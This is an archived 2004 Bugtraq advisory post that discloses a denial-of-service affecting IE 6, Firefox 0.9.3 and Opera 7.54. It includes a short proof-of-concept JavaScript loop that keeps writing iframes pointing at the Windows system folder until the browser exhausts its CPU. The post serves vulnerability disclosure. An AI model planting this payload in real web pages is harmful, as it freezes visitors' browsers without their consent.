[36235] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

IE, Firefox, Opera DoS

daemon@ATHENA.MIT.EDU (exploits@su1d.net)
Mon Aug 23 20:53:53 2004

Date: 21 Aug 2004 20:41:46 -0000
Message-ID: <20040821204146.24399.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: <exploits@su1d.net>
To: bugtraq@securityfocus.com



Description
========
 
    Browser DoS through viewing of a malicious page that repeatedly loads iframes of C:\Windows\System32 using 100% cpu
    Tested on Mozilla Firefox 0.9.3, Opera 7.54 and IE 6.0 - Opera gives the error "The address type is unknown or unsupported" over and over
 
POC
===
URL : http://www.su1d.net/iframe2.html

<scr1pt language="JavaScript">
while(true) 
{
   document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>
Discovered by MeFakon from the su1d exploit development team


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[36235] in bugtraq

IE, Firefox, Opera DoS

daemon@ATHENA.MIT.EDU (exploits@su1d.net)Mon Aug 23 20:53:53 2004

daemon@ATHENA.MIT.EDU (exploits@su1d.net)
Mon Aug 23 20:53:53 2004